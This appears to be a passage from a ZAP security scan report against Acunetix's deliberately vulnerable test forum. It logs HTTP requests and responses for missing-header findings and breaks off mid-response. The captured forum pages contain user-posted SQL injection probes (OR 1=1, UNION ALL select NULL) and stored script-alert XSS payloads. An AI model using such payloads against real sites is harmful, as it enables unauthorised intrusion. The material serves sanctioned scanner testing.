class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%' -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/styles.css |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 308 bytes. |
GET http://testasp.vulnweb.com/styles.css HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 247 bytes. |
HTTP/1.1 200 OK
Content-Type: text/css Last-Modified: Thu, 29 May 2008 12:11:27 GMT Accept-Ranges: bytes ETag: "cea5331f85c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:23 GMT Content-Length: 3390 |
| Response Body - size: 3,390 bytes. |
body {
font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px; margin: 0; } td { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px; } th { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px; } .bodystyle { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px; } .small { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 9px; } .medium { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px; } .big { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 16px; } .xbig { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 24px; } .expanded { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 16px; letter-spacing: 2px; } .justified { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; text-align: justify; } .footer { font-family: "Times New Roman", Times, serif; font-size: 10px; color: #008F00; } .menubar { padding: 3px; border-width: thin; border-style: solid; border-color: #00CC00 #006600 #006600 #00CC00; margin-top: 5px; margin-bottom: 5px; margin-right: 0px; margin-left: 0px; background-color: #BFFFBF; } A.menu { padding-right: 10px; padding-left: 10px; color: #008F00; text-decoration: none; background-color: #BFFFBF; } A.menu:hover { padding-right: 10px; padding-left: 10px; color: #BFFFBF; text-decoration: none; background-color: #008F00; } .disclaimer { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px; padding-top: 0px; padding-right: 10px; padding-bottom: 0px; padding-left: 10px; color: #BFFFBF; } .FramedForm { border-right: #008F00 1px solid; border-top: #008F00 1px solid; border-left: #008F00 1px solid; border-bottom: #008F00 1px solid; background-color: #BFFFBF; margin-top: 10px; margin-bottom: 10px; padding: 5px; } .tableheader { border-right: #008F00 1px solid; border-top: #008F00 1px solid; border-left: #008F00 1px solid; border-bottom: #008F00 1px solid; background-color: #008F00; color: #BFFFBF; font-weight: bold; } .forumtitle { font-size: 14px; font-weight: bold; text-transform: capitalize; color: #008F00; margin-top: 5px; margin-bottom: 5px; } .forumdescription { margin-left: 15px; } .userinfo { text-align: center; font-weight: bold; display: block; position: relative; width: 100px; } .post { border-top: 1px solid #008F00; border-right: 1px none #008F00; border-bottom: 1px none #008F00; border-left: 1px none #008F00; } .posttitle { border: 1px none #80FF80; background-color: #BFFFBF; font-weight: bold; margin-bottom: 15px; padding: 2px; } INPUT { border-width: 1px; border-style: solid; border-color: #00CC00 #006600 #006600 #00CC00; } TEXTAREA { border-width: 1px; border-style: solid; border-color: #00CC00 #006600 #006600 #00CC00; } INPUT.Login { width: 250px; } INPUT.postit { width: 450px; } TEXTAREA.postit { width: 450px; height: 300px; } .path { font-weight: bold; color: #006600; margin-top: 0px; margin-right: 0px; margin-bottom: 10px; margin-left: 0px; } INPUT.search { } |
| URL | http://testasp.vulnweb.com/Templatize.asp?item=html/about.html |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 333 bytes. |
GET http://testasp.vulnweb.com/Templatize.asp?item=html/about.html HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 4594 |
| Response Body - size: 4,594 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>Untitled Document</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a forum site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="http://www.acunetix.com/company/contact.htm"> offices</A> in Malta, US and the UK.<BR> </P> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=0 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=0 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 178 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:35 GMT Content-Length: 13536 |
| Response Body - size: 13,536 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>) UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>') UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>") UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> ASC -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:13:44 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>o3lppoLN</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:05:24 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Call me maybe<script>alert('Beautiful in white)</script> - 202.187.185.168</div><div class='posttext'>HI Maybe<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:06:11 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Call me maybe<script>alert('Beautiful in white')</script> - 202.187.185.168</div><div class='posttext'>HI Maybe<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:51:58 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 <script>alert('Hello')</script> - 180.75.245.68</div><div class='posttext'>HELLO<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>hanxuan</b> on 3/13/2022 2:43:15 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>hi - 180.75.236.90</div><div class='posttext'>http://example.com/han.js<br />document.write("I'm coming");</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=1 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:35 GMT Content-Length: 4913 |
| Response Body - size: 4,913 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:12:27 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script><br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:12:55 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 - 180.74.64.218</div><div class='posttext'>Message 1<script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:08 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>111 - 180.74.64.218</div><div class='posttext'>Message 1<script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:31 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>123 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:41 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>123 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:51 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1<script>alert('Hello')</script> - 180.74.64.218</div><div 